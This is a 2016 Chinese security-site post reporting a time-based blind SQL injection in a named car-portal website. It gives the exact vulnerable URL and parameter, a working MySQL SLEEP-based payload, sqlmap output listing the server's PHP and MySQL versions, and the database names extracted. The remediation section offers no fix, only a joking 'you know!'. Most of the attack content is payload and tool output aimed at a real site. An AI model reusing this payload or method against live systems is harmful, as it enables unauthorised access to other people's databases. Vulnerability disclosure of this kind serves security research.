频道栏目
首页 > 安全 > 网站安全 > 正文
网上车市某站SQL注入
2016-02-19 09:21:41         来源:我是你大爷  
收藏   我要投稿

~~~~

注入点 https://app.cheshi.com/substation/ad.php?province=21&city=299&pid=1*

注入参数 pid

基于时间的盲注。可获取数据,很慢容易把服务器搞挂,不继续了。
 

屏幕快照 2016-01-30 10.45.13.png

  

sqlmap identified the following injection point(s) with a total of 87 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: https://app.cheshi.com:80/substation/ad.php?province=21&city=299&pid=1' AND (SELECT * FROM (SELECT(SLEEP(5)))ujDh) AND 'MlVk'='MlVk
---
web application technology: PHP 5.2.14
back-end DBMS: MySQL 5.0.12
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: https://app.cheshi.com:80/substation/ad.php?province=21&city=299&pid=1' AND (SELECT * FROM (SELECT(SLEEP(5)))ujDh) AND 'MlVk'='MlVk
---
web application technology: PHP 5.2.14
back-end DBMS: MySQL >= 5.0.0
available databases [2]:
[*] ad
[*] information_schema

 

解决方案:

你懂得!

点击复制链接 与好友分享!回本站首页
相关TAG标签 车市
上一篇:网易某站点MySQL注射(附python脚本)
下一篇:美团云服务主站某漏洞涉及大量用户信息并可控制云主机
相关文章
图文推荐
点击排行

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站